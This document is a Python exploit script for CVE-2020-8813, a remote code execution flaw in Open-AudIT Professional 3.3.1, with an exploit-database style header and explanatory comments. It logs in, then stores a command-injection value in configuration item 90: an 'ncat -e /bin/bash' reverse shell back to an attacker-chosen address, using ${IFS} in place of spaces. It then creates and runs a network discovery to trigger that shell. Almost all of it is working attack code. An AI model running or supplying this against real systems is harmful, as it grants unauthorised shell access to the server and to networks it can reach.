
Open-AudIT Professional 3.3.1 远程代码执行漏洞



EXP

# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

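warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


# --- Argument handling -----------------------------------------------------
# Positional arguments: url username password ip port.
# `ip`/`port` are the listener the reverse shell connects back to; they are
# interpolated verbatim into a shell command stored on the target (see
# inject_payload), so keep them to a plain address and a numeric port.
if len(sys.argv) != 6:
    print("~ Usage : ./openaudit-exploit.py url username password ip port")
    sys.exit(1)  # non-zero so wrapping scripts notice the failure

# The rendered listing had the subscripts stripped (sys.argv1 ...); restored.
url = sys.argv[1].rstrip("/")  # avoid ".../host//en/omk/..." on a trailing slash
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

# Fail early on a non-numeric port instead of planting a broken command.
try:
    int(port)
except ValueError:
    print("- port must be an integer, got %r" % port)
    sys.exit(1)

# One session so the auth cookie set by login() is reused by every request.
request = requests.Session()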

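def inject_payload():
    """Store the reverse-shell command in Open-AudIT configuration item 90.

    Sends a PATCH that sets the item's ``value`` to
    ``;ncat -e /bin/bash <ip> <port>;`` (CVE-2020-8813).  ``${IFS}`` is used
    in place of literal spaces, a common trick when the injected value must
    not contain spaces.  Nothing executes yet: the command presumably fires
    when the stored value is used by a discovery run (see start_discovery).

    Engagement notes:
      * This overwrites a persisted configuration value on the target.
        Record the current value first (GET the same path) and restore it
        when done.
      * The listener at ``ip:port`` must be reachable from the target and
        ``ncat`` must exist there, otherwise the callback never arrives.

    Exits with status 1 when the server does not accept the PATCH.
    """
    configuration_path = url + "/en/omk/open-audit/configuration/90"
    # Leading ";" presumably ends whatever command the value is appended to;
    # the trailing ";" stops any suffix from becoming ncat arguments.
    data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
    resp = request.patch(configuration_path, data)
    if not resp.ok:
        # A rejected PATCH means the later discovery run would just be a
        # normal scan; stop here so the operator does not wait on a shell.
        print("- Payload injection rejected (HTTP %d)" % resp.status_code)
        sys.exit(1)
    print("+ Payload injected in settings")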


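def start_discovery(subnet="10.10.10.1/24"):
    """Create a discovery and execute it, which triggers the injected command.

    Flow: GET the create form (for the access token), POST a minimal subnet
    discovery, then GET ``<Location>/execute`` on the created discovery.  The
    reverse shell is expected to connect back while the discovery runs.

    subnet: range the discovery is configured to scan.  Executing a discovery
        presumably starts a real scan from the target against this range, so
        on a live engagement pass something small and in scope rather than
        relying on the default (kept for backward compatibility).

    Exits with status 1 when no access token or no ``Location`` header is
    found (form layout change, expired session, or a rejected POST).
    """
    discovery_path = url + "/en/omk/open-audit/discoveries/create"
    post_discovery_path = url + "/en/omk/open-audit/discoveries"
    scan_name = "".join(random.choice(string.ascii_uppercase) for _ in range(10))

    form = BeautifulSoup(request.get(discovery_path).text, "html5lib")
    # Prefer the token field by name (assumed to match the POST field below);
    # fall back to the original positional pick (6th <input>), which breaks
    # silently if the form layout changes.
    token_input = form.find("input", {"name": "data[access_token]"})
    if token_input is None:
        inputs = form.findAll("input")
        token_input = inputs[5] if len(inputs) > 5 else None
    token = token_input.get("value") if token_input is not None else None
    if not token:
        print("- Could not find the access token in the discovery form")
        sys.exit(1)

    headers = {"Referer": discovery_path}
    # NOTE(review): the rendered listing lost its square brackets (it showed
    # e.g. "dataattributesname"); the PHP-style nested field names below are
    # reconstructed from that and should be checked against the live form.
    request_data = {
        "data[attributes][name]": scan_name,
        "data[attributes][other][subnet]": subnet,
        "data[attributes][other][ad_server]": "",
        "data[attributes][other][ad_domain]": "",
        "submit": "",
        "data[type]": "discoveries",
        "data[access_token]": token,
        "data[attributes][complete]": "y",
        "data[attributes][org_id]": "1",
        "data[attributes][type]": "subnet",
        "data[attributes][devices_assigned_to_org]": "",
        "data[attributes][devices_assigned_to_location]": "",
        "data[attributes][other][nmap][discovery_scan_option_id]": "1",
        "data[attributes][other][nmap][ping]": "y",
        "data[attributes][other][nmap][service_version]": "n",
        "data[attributes][other][nmap][open|filtered]": "n",
        "data[attributes][other][nmap][filtered]": "n",
        "data[attributes][other][nmap][timing]": "4",
        "data[attributes][other][nmap][nmap_tcp_ports]": "0",
        "data[attributes][other][nmap][nmap_udp_ports]": "0",
        "data[attributes][other][nmap][tcp_ports]": "22,135,62078",
        "data[attributes][other][nmap][udp_ports]": "161",
        "data[attributes][other][nmap][timeout]": "",
        "data[attributes][other][nmap][exclude_tcp_ports]": "",
        "data[attributes][other][nmap][exclude_udp_ports]": "",
        "data[attributes][other][nmap][exclude_ip]": "",
        "data[attributes][other][nmap][ssh_ports]": "22",
        "data[attributes][other][match][match_dbus]": "",
        "data[attributes][other][match][match_fqdn]": "",
        "data[attributes][other][match][match_dns_fqdn]": "",
        "data[attributes][other][match][match_dns_hostname]": "",
        "data[attributes][other][match][match_hostname]": "",
        "data[attributes][other][match][match_hostname_dbus]": "",
        "data[attributes][other][match][match_hostname_serial]": "",
        "data[attributes][other][match][match_hostname_uuid]": "",
        "data[attributes][other][match][match_ip]": "",
        "data[attributes][other][match][match_ip_no_data]": "",
        "data[attributes][other][match][match_mac]": "",
        "data[attributes][other][match][match_mac_vmware]": "",
        "data[attributes][other][match][match_serial]": "",
        "data[attributes][other][match][match_serial_type]": "",
        "data[attributes][other][match][match_sysname]": "",
        "data[attributes][other][match][match_sysname_serial]": "",
        "data[attributes][other][match][match_uuid]": "",
    }
    print("+ Creating discovery ..")
    resp = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
    # The created discovery's URL comes back as a redirect; without it there
    # is nothing to execute (the original raised KeyError here).
    location = resp.headers.get("Location")
    if not location:
        print("- Discovery was not created (HTTP %d, no Location header)" % resp.status_code)
        sys.exit(1)
    # Only prefix the base URL when the redirect is relative.
    execute_url = (location if location.startswith("http") else url + location) + "/execute"
    print("+ Triggering payload ..")
    print("+ Check your nc ;)")
    request.get(execute_url)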


def login():
    """Authenticate the shared session against Open-AudIT.

    POSTs the username/password to the login endpoint so the session picks
    up the auth cookie reused by every later request.  Success is inferred
    only from the absence of the text "There was an error authenticating"
    in the response body; there is no status-code check, so an unrelated
    error page would be reported as a successful login.  Credentials travel
    in whatever scheme ``url`` uses -- plaintext if that is http.

    Returns True on (apparent) success, False when the error text is seen.
    """
    form = {
        "redirect_url": "/en/omk/open-audit",
        "username": username,
        "password": password,
    }
    body = request.post(url + "/en/omk/open-audit/login", form).text
    return "There was an error authenticating" not in body

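# Entry point: authenticate, plant the command, then trigger it.
if not login():
    print("- Cannot login!")
    sys.exit(1)  # non-zero exit so a wrapper can tell failed auth from success
print("+ LoggedIn Successfully")
inject_payload()
start_discovery()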
